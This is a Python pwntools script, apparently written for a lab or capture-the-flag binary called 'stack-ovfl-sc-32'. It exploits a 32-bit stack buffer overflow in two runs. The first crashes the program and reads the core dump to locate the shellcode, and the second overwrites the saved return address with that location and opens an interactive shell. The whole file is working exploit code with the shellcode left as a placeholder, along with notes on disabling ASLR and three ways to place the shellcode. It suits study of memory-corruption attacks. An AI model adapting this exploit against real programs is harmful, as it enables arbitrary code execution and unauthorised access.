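#!/usr/bin/env python
"""Two-run stack-overflow exploit helper for the 32-bit `stack-ovfl-sc-32` target.

Run 1 crashes the target with a long buffer and reads the resulting core
dump to locate SHELLCODE on the stack.  Run 2 sends that address, repeated,
so that the saved return address is overwritten with the shellcode location.

The address learned in run 1 is only valid in run 2 if the stack layout is
identical across both runs: ASLR is therefore disabled for the spawned
processes and argv/envp are kept the same both times.

Before running, choose exactly one place to put the shellcode (ENV, ARG1 or
the overflowing buffer).  With the defaults below SHELLCODE never enters the
target, the core-file search fails and the script aborts with a message.
"""
from pwn import *

# Bytes, not str: the core file's mappings expose raw bytes, so a str needle
# would not match (and raises TypeError) under Python 3.
SHELLCODE = b'SET YOUR SHELLCODE HERE'
ARG1 = ''
ENV = {}

TARGET = "stack-ovfl-sc-32"
CRASH_PAD = b"aaaa" * 500        # long enough to clobber the saved EIP
SPRAY_COUNT = 100                # copies of the address sent in run 2

# Run 1 learns a stack address that run 2 reuses, so both processes must get
# the same memory layout.  Disabling ASLR here is best-effort (pwntools uses
# personality()); a setuid target would re-randomise regardless.
context.aslr = False

# Option A: shellcode in ENVP.  envp entries are C strings, so the shellcode
# must not contain a NUL byte or it is truncated.
#ENV = {'SHELLCODE': SHELLCODE}

# Option B: shellcode in ARGV (same NUL-byte restriction as ENVP).
#ARG1 = SHELLCODE


def spawn():
    """Start the target with the same argv/envp every time.

    Keeping argv and envp identical between the crash run and the exploit
    run is what makes the stack address found in the core dump reusable.
    """
    return process([TARGET, ARG1], env=ENV)


# ---- run 1: crash the target and recover the shellcode address from core --
p = spawn()
print(p.recv(0x100))

# Overflow the buffer to force a segfault, and therefore a core dump.
p.send(CRASH_PAD)

# Option C: shellcode at the start of the overflowing buffer instead of
# argv/envp.  Padding to a 4-byte boundary keeps the address spray aligned.
#p.send(SHELLCODE + b"a" * (4 - len(SHELLCODE) % 4) + b"AAAA" * 500)

p.wait()

# Assumes core dumps are enabled (ulimit -c unlimited) and that the kernel's
# core_pattern writes a file literally named `core` into the current directory.
c = Core('./core')
addr_shellcode = c.stack.find(SHELLCODE)
if addr_shellcode == -1:
    # Without this guard the script would try to pack -1 and send garbage.
    raise SystemExit(
        "SHELLCODE not found in the core's stack mapping: place it in ENV, "
        "ARG1 or the overflow buffer (see the commented options)."
    )
print("Your shellcode is at 0x%08x" % addr_shellcode)

# ---- run 2: same layout, overwrite the return address with that location --
p = spawn()
print(p.recv(0x100))
# Repeat the address so that wherever the saved return address lies inside
# the overflowed region it is replaced by the shellcode location.
p.send(p32(addr_shellcode) * SPRAY_COUNT)
p.interactive()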